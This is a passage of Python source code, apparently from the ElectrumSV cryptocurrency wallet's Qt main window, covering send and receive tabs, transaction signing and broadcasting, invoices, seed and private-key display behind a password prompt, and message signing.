self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address = addr
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.update_receive_address_widget()
def update_receive_address_widget(self):
text = ''
if self.receive_address:
text = self.receive_address.to_string()
self.receive_address_e.setText(text)
def clear_receive_tab(self):
self.expires_label.hide()
self.expires_combo.show()
self.set_receive_address(self.wallet.get_receiving_address())
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
self.receive_address = addr
self.show_receive_tab()
self.new_request_button.setEnabled(True)
self.update_receive_address_widget()
def update_receive_qr(self):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = web.create_URI(self.receive_address, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(self.receive_address_e.text(), amount,
message, uri)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
# This ensures all columns are stretched over the full width of the last tab.
grid.setColumnStretch(4, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit()
self.payto_e = PayToEdit(self)
# From fields row.
# This is enabled by "spending" coins in the coins tab.
self.from_label = QLabel(_('From'))
self.from_label.setContentsMargins(0, 5, 0, 0)
self.from_label.setAlignment(Qt.AlignTop)
grid.addWidget(self.from_label, 1, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['Address / Outpoint','Amount'])
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 1, 1, 1, -1)
self.set_pay_from([])
msg = (_('Recipient of the funds.') + '\n\n' +
_('You may enter a Bitcoin SV address, a label from your list of '
'contacts (a list of completions will be proposed), or an alias '
'(email-like address that forwards to a Bitcoin SV address)'))
payto_label = HelpLabel(_('Pay to'), msg)
payto_label.setSizePolicy(QSizePolicy.Maximum, QSizePolicy.Preferred)
grid.addWidget(payto_label, 2, 0)
grid.addWidget(self.payto_e, 2, 1, 1, -1)
msg = (_('Amount to be sent.') + '\n\n' +
_('The amount will be displayed in red if you do not have '
'enough funds in your wallet.') + ' '
+ _('Note that if you have frozen some of your addresses, the available '
'funds will be lower than your total balance.') + '\n\n'
+ _('Keyboard shortcut: type "!" to send all your coins.'))
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(app_state.fx.get_currency if app_state.fx else '')
if not app_state.fx or not app_state.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Preferred)
grid.addWidget(self.max_button, 3, 3)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = (_('Description of the transaction (not mandatory).') + '\n\n' +
_('The description is not sent to the recipient of the funds. '
'It is stored in your wallet file, and displayed in the \'History\' tab.'))
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 4, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 4, 1, 1, -1)
# OP_RETURN fields row
msg_attached = (_('Attached files (optional).') + '\n\n' +
_('Posts PERMANENT data to the Bitcoin SV blockchain as part of '
'this transaction using OP_RETURN.') + '\n\n' +
_('If you attach files, the \'Pay to\' field can be left blank.'))
attached_data_label = HelpLabel(_('Attached Files'), msg_attached)
attached_data_label.setContentsMargins(0, 5, 0, 0)
attached_data_label.setAlignment(Qt.AlignTop)
grid.addWidget(attached_data_label, 5, 0)
hbox = QHBoxLayout()
hbox.setSpacing(0)
def attach_menu(*args):
pass
self.send_data_list = MyTreeWidget(self, attach_menu,
[ "", _("File size"), _("File name"), "" ], 2)
self.send_data_list.setSelectionMode(MyTreeWidget.SingleSelection)
self.send_data_list.setSelectionBehavior(MyTreeWidget.SelectRows)
hbox.addWidget(self.send_data_list)
vbox = QVBoxLayout()
vbox.setSpacing(0)
vbox.setContentsMargins(5, 0, 0, 0)
attach_button = EnterButton("", self._do_add_send_attachments)
attach_button.setToolTip(_("Add file(s)"))
attach_button.setIcon(read_QIcon("icons8-attach-96.png"))
attach_button.setSizePolicy(QSizePolicy.Maximum, QSizePolicy.Maximum)
vbox.addWidget(attach_button)
vbox.addStretch()
hbox.addLayout(vbox)
self._on_send_data_list_updated()
grid.addLayout(hbox, 5, 1, 1, -1)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(
_('Display the details of your transactions before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
if self.network is None:
self.send_button.setEnabled(False)
self.send_button.setToolTip(_('You are using ElectrumSV in offline mode; restart '
'ElectrumSV if you want to get connected'))
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
buttons.addStretch(1)
grid.addLayout(buttons, 6, 0, 1, -1)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(t):
self.is_max = False
self.max_button.setEnabled(not bool(t))
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
if self.not_enough_funds:
amt_color = ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += (' (' + self.format_amount(c+u+x).strip() + ' ' +
app_state.base_unit() + ' ' + _("are frozen") + ')')
if self.amount_e.isModified():
amt_color = ColorScheme.DEFAULT
else:
amt_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
return w
def spend_max(self):
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return self.wallet.dummy_address()
def get_custom_fee_text(self, fee_rate = None):
if not self.config.has_custom_fee_rate():
return ""
else:
if fee_rate is None: fee_rate = self.config.custom_fee_rate() / 1000.0
return str(round(fee_rate*100)/100) + " sats/B"
def get_opreturn_outputs(self, outputs):
table = self.send_data_list
file_paths = []
for row_index in range(table.model().rowCount()):
item = table.topLevelItem(row_index)
file_paths.append(item.data(0, Qt.UserRole))
if len(file_paths):
data_chunks = []
for file_path in file_paths:
with open(file_path, "rb") as f:
data_chunks.append(f.read())
script = (Script() << OP_RETURN).push_many(data_chunks)
return [TxOutput(0, script)]
return []
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
amount = all if self.is_max else self.amount_e.get_amount()
if amount is None:
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee = None
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
addr = self.get_payto_or_dummy()
outputs = [TxOutput(amount, addr.to_script())]
outputs.extend(self.get_opreturn_outputs(outputs))
try:
tx = self.wallet.make_unsigned_transaction(self.get_coins(), outputs,
self.config, fee)
self.not_enough_funds = False
except NotEnoughFunds:
self.not_enough_funds = True
return
except Exception:
return
if self.is_max:
amount = tx.output_value()
self.amount_e.setAmount(amount)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format_utxo(utxo):
h = utxo.tx_hash
return '{}...{}:{:d}\t{}'.format(h[0:10], h[-10:],
utxo.out_index, utxo.address)
for utxo in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem(
[format_utxo(utxo), self.format_amount(utxo.value)]))
update_fixed_tree_height(self.from_list)
def get_contact_payto(self, contact_id):
contact = self.contacts.get_contact(contact_id)
return contact.label
def protected(func): # pylint: disable=no-self-argument
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def read_send_tab(self):
isInvoice= False
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
isInvoice = True
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid lines found:") + "\n\n" +
'\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1]
for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
outputs.extend(self.get_opreturn_outputs(outputs))
if not outputs:
self.show_error(_('No outputs'))
return
if any(output.value is None for output in outputs):
self.show_error(_('Invalid Amount'))
return
fee = None
coins = self.get_coins(isInvoice)
return outputs, fee, label, coins
def _on_send_data_list_updated(self):
item_count = self.send_data_list.model().rowCount()
is_enabled = item_count > 0
self.send_data_list.setEnabled(is_enabled)
self.send_data_list.setToolTip(_("Attach a file to include it in the transaction."))
update_fixed_tree_height(self.send_data_list, maximum_height=80)
def _do_add_send_attachments(self):
dialogs.show_named('illegal-files-are-traceable')
table = self.send_data_list
file_paths = self.getOpenFileNames(_("Select file(s)"))
last_item = None
for file_path in file_paths:
file_name = os.path.basename(file_path)
file_size = os.path.getsize(file_path)
item = QTreeWidgetItem()
item.setData(0, Qt.UserRole, file_path)
item.setIcon(0, read_QIcon("icons8-file-512.png"))
item.setText(1, str(file_size))
item.setTextAlignment(1, Qt.AlignRight | Qt.AlignVCenter)
item.setText(2, file_name)
table.addChild(item)
# Setting item column widgets only works when the item is added to the table.
delete_button = QPushButton()
delete_button.clicked.connect(partial(self._on_delete_attachment, file_path))
delete_button.setFlat(True)
delete_button.setCursor(QCursor(Qt.PointingHandCursor))
delete_button.setIcon(read_QIcon("icons8-trash.svg"))
table.setItemWidget(item, 3, delete_button)
last_item = item
if last_item is not None:
self._on_send_data_list_updated()
table.scrollToItem(last_item)
def _on_delete_attachment(self, file_path, checked=False):
table = self.send_data_list
for row_index in range(table.model().rowCount()):
item = table.topLevelItem(row_index)
item_file_path = item.data(0, Qt.UserRole)
if item_file_path == file_path:
table.takeTopLevelItem(row_index)
break
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
dialogs.show_named('think-before-sending')
r = self.read_send_tab()
if not r:
return
outputs, fee, tx_desc, coins = r
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except ExcessiveFee:
self.show_message(_("Your fee is too high. Max is 50 sat/byte."))
return
except Exception as e:
self.logger.exception("")
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(output.value for output in outputs)
fee = tx.get_fee()
if preview:
self.show_transaction(tx, tx_desc)
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
confirm_rate = 2 * self.config.max_fee_rate()
if fee < (tx.estimated_size()):
msg.append(_('Warning') + ': ' +
_('The fee is less than 1000 sats/kb. '
'It may take a very long time to confirm.'))
if self.wallet.has_password():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password, window=None):
self.sign_tx_with_password(tx, callback, password, window=window)
def sign_tx_with_password(self, tx, callback, password, window=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_done(future):
try:
future.result()
except Exception as exc:
self.on_exception(exc)
callback(False)
else:
callback(True)
def sign_tx():
if self.tx_external_keypairs:
tx.sign(self.tx_external_keypairs)
else:
self.wallet.sign_transaction(tx, password)
window = window or self
WaitingDialog(window, _('Signing transaction...'), sign_tx, on_done=on_done)
def broadcast_transaction(self, tx, tx_desc, success_text=None, window=None):
if success_text is None:
success_text = _('Payment sent.')
window = window or self
def broadcast_tx():
# non-GUI thread
status = False
msg = "Failed"
pr = self.payment_request
if pr:
if pr.has_expired():
self.payment_request = None
raise Exception(_("Payment request has expired"))
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_payment(str(tx), refund_address)
msg = ack_msg
if ack_status:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
return None
else:
return self.network.broadcast_transaction_and_wait(tx)
def on_done(future):
# GUI thread
try:
tx_id = future.result()
except Exception as exception:
self.logger.info(f'raw server error (untrusted): {exception}')
reason = broadcast_failure_reason(exception)
d = UntrustedMessageDialog(
window, _("Transaction Broadcast Error"),
_("Your transaction was not sent: ") + reason + ".",
exception)
d.exec()
else:
if tx_id:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
window.show_message(success_text + '\n' + tx_id)
self.invoice_list.update()
self.do_clear()
WaitingDialog(window, _('Broadcasting transaction...'), broadcast_tx, on_done=on_done)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.max_button.setDisabled(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.set_validated()
else:
self.payto_e.set_expired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), app_state.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = web.parse_URI(URI, self.on_pr)
except Exception as e:
self.show_error(str(e))
return
self.show_send_tab()
payment_url = out.get('r')
if payment_url:
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
edit_fields = []
edit_fields.extend(self.send_tab.findChildren(QPlainTextEdit))
edit_fields.extend(self.send_tab.findChildren(QLineEdit))
for edit_field in edit_fields:
edit_field.setText('')
edit_field.setFrozen(False)
for tree in self.send_tab.findChildren(QTreeView):
tree.clear()
self._on_send_data_list_updated()
self.max_button.setDisabled(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_coin_state(self, utxos, freeze):
self.wallet.set_frozen_coin_state(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_coinsplitting_tab(self):
return CoinSplittingTab(self)
def create_list_tab(self, l, list_header=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if list_header:
hbox = QHBoxLayout()
for b in list_header:
hbox.addWidget(b)
hbox.addStretch()
vbox.addLayout(hbox)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
return self.create_list_tab(l)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
self.contact_list = l = ContactList(self._api, self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?"
.format(addr.to_string()))):
self.wallet.delete_address(addr)
self.address_list.update()
self.history_list.update()
self.history_updated_signal.emit()
self.clear_receive_tab()
def get_coins(self, isInvoice = False):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config, isInvoice)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, contact_ids: Iterable[int]):
paytos = [self.get_contact_payto(contact_id) for contact_id in contact_ids]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def _on_contacts_changed(self) -> None:
self.contact_list.update()
self.history_list.update()
self.history_updated_signal.emit()
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(self.format_amount(tx_output.value) + app_state.base_unit() +
' @ ' + tx_output_to_display_text(tx_output)[0]
for tx_output in pr.get_outputs())
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires, _("Unknown"))), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip270.json")
if not fn:
return
with open(fn, 'w') as f:
data = f.write(pr.to_json())
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.history_updated_signal.emit()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'app': self.app,
'config': app_state.config,
'daemon': app_state.daemon,
'electrumsv': electrumsv,
'network': self.network,
'util': util,
'wallet': self.wallet,
'window': self,
})
c = commands.Commands(self.config, self.wallet, self.network,
lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method, *args, password_getter=self.password_dialog,
**kwargs)
for m in dir(c):
if m[0] == '_' or m in ['network', 'wallet', 'config']:
continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
from .status_bar import StatusBar
self._status_bar = StatusBar(self)
self.set_status_bar_balance(False)
self.setStatusBar(self._status_bar)
def set_status_bar_balance(self, shown: bool) -> None:
if shown:
c, u, x = self.wallet.get_balance()
bsv_status, fiat_status = self.get_amount_and_units(c)
else:
bsv_status, fiat_status = _("Unknown"), None
self._status_bar.set_balance_status(bsv_status, fiat_status)
def update_buttons_on_seed(self):
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from .password_dialog import ChangePasswordDialog
d = ChangePasswordDialog(self, self.wallet)
ok, password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password, encrypt_file)
except Exception as e:
self.show_error(str(e))
return
except:
self.logger.exception("")
self.show_error(_('Failed to update password'))
return
msg = (_('Password was updated successfully') if new_password
else _('Password is disabled, this wallet is not protected'))
self.show_message(msg, title=_("Success"))
def toggle_search(self):
self._status_bar.search_box.setHidden(not self._status_bar.search_box.isHidden())
if not self._status_bar.search_box.isHidden():
self._status_bar.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def show_master_public_keys(self):
dialog = QDialog(self)
dialog.setWindowTitle(_("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for Electrum #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet() # pylint: disable=no-value-for-parameter
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
app_state.daemon.stop_wallet_at_path(wallet_path)
self.close()
os.unlink(wallet_path)
self.update_recently_visited(wallet_path) # this ensures it's deleted from the menu
self.show_error("Wallet removed:" + basename)
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except Exception as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception("")
self.show_message(str(e))
return
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel('{}: {}'.format(_("Address"), address)))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=address.to_script_bytes().hex())
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in ElectrumSV, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
try:
addr = Address.from_string(address)
except:
self.show_message(_('Invalid Bitcoin SV address.'))
return
if not isinstance(addr, P2PKH_Address):
self.show_message(_('Cannot sign messages with this type of address.') + '\n\n' +
self.msg_sign)
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(addr):
self.show_message(_('Address not in wallet.'))
return
def show_signed_message(sig):
signature.setText(base64.b64encode(sig).decode('ascii'))
self.run_in_thread(self.wallet.sign_message, addr, message, password,
on_success=show_signed_message)
def run_in_thread(self, func, *args, on_success=None):
def _on_done(future):
try:
result = future.result()
except Exception as exc:
self.on_exception(exc)
else:
if on_success:
on_success(result)
return self.app.run_in_thread(func, *args, on_done=_on_done)
def do_verify(self, address, message, signature):
try:
address = Address.from_string(address.text().strip()).to_string()
except:
self.show_message(_('Invalid Bitcoin SV address.'))
return
message = message.toPlainText().strip()
try:
# This can throw on invalid base64
sig = base64.b64decode(signature.toPlainText())
verified = PublicKey.verify_message_and_address(sig, message, address)
except:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=None):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address.to_string() if address else '')
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
def do_sign(checked=False):
# pylint: disable=no-value-for-parameter
self.do_sign(address_e, message_e, signature_e)
b.clicked.connect(do_sign)
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(partial(self.do_verify, address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
def show_decrypted_message(msg):
message_e.setText(msg.decode())
self.run_in_thread(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password,
on_success=show_decrypted_message)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
